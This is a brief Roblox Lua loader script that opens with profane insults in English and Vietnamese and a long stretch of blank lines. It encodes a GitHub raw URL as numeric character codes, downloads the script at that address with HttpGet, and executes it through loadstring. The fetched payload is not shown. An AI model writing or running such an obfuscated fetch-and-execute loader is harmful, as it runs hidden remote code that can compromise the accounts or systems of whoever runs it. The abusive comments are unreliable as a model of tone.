-- you fuck
-- con đỉ mẹ mày mò lồn j
-- you stupid
-- đmmm
-- cc















local H=game:GetService("HttpService")

local function u(t)
local s={}
for i=1,#t do
s[i]=string.char(t[i])
end
return table.concat(s)
end

local a={
104,116,116,112,115,58,47,47,114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109,47,
98,108,111,111,100,104,117,98,45,101,109,112,121,116,105,47,
109,111,100,47,114,101,102,115,47,104,101,97,100,115,47,109,97,105,110,47,
111,98,102,117,115,45,101,122
}

loadstring(game:HttpGet(u(a)))()
